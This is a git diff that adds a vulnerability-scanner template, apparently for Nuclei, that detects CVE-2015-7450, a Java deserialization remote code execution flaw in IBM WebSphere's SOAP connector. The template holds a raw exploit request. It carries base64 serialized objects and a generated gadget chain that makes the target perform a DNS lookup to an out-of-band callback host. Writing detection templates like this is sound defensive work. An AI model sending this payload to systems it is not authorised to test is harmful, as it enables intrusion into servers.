diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml
new file mode 100644
index 0000000000..e27a3e815f
--- /dev/null
+++ b/cves/2015/CVE-2015-7450.yaml
@@ -0,0 +1,51 @@
+id: CVE-2015-7450
+
+info:
+ name: IBM WebSphere Java Object Deserialization RCE
+ author: wdahlenb
+ severity: critical
+ description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default)
+ reference:
+ - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
+ - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450
+ tags: cve,cve2015,websphere,deserialization,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml; charset=utf-8
+ SOAPAction: "urn:AdminService"
+
+
+
+
+
+
+
+ rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==
+ getUnsavedChanges
+ {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}
+ rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+
+ - type: word
+ words:
+ - 'SOAP-ENV:Server'
+ - ''
+ condition: and
+
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"